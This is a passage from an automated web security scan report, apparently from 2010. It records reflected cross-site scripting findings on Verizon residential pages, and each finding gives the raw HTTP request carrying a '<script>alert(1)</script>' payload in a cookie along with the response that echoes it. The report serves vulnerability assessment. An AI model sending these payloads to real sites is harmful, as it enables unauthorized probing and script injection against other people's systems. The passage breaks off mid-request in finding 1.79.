Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX4abd8<script>alert(1)</script>d0d4bb3410c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71900
Expires: Sat, 20 Nov 2010 03:14:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4abd8<script>alert(1)</script>d0d4bb3410c; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4ABD8<SCRIPT>ALERT(1)</SCRIPT>D0D4BB3410C </DIV>
...[SNIP]...

1.74. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff9'><script>alert(1)</script>5f319f2b2d3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fff9'><script>alert(1)</script>5f319f2b2d3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 00:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fff9'><script>alert(1)</script>5f319f2b2d3; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FFF9'><SCRIPT>ALERT(1)</SCRIPT>5F319F2B2D3 ' />
...[SNIP]...

1.75. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 306e5<script>alert(1)</script>de57f988df3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX306e5<script>alert(1)</script>de57f988df3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71900
Expires: Sat, 20 Nov 2010 00:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX306e5<script>alert(1)</script>de57f988df3; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX306E5<SCRIPT>ALERT(1)</SCRIPT>DE57F988DF3 </DIV>
...[SNIP]...

1.76. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/CheckAvailability/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65b09'><script>alert(1)</script>cb2218c31f2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX65b09'><script>alert(1)</script>cb2218c31f2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64444
Expires: Sat, 20 Nov 2010 03:13:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX65b09'><script>alert(1)</script>cb2218c31f2; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX65B09'><SCRIPT>ALERT(1)</SCRIPT>CB2218C31F2 ' />
...[SNIP]...

1.77. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1d1'><script>alert(1)</script>6e680d13017 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXbd1d1'><script>alert(1)</script>6e680d13017; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62999
Expires: Sat, 20 Nov 2010 03:14:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbd1d1'><script>alert(1)</script>6e680d13017; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBD1D1'><SCRIPT>ALERT(1)</SCRIPT>6E680D13017 ' />
...[SNIP]...

1.78. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>ece11e87003 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcdf59'><script>alert(1)</script>ece11e87003; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64487
Expires: Sat, 20 Nov 2010 00:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcdf59'><script>alert(1)</script>ece11e87003; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDF59'><SCRIPT>ALERT(1)</SCRIPT>ECE11E87003 ' />
...[SNIP]...

1.79. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9450<script>alert(1)</script>4aca6b8b3b4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; 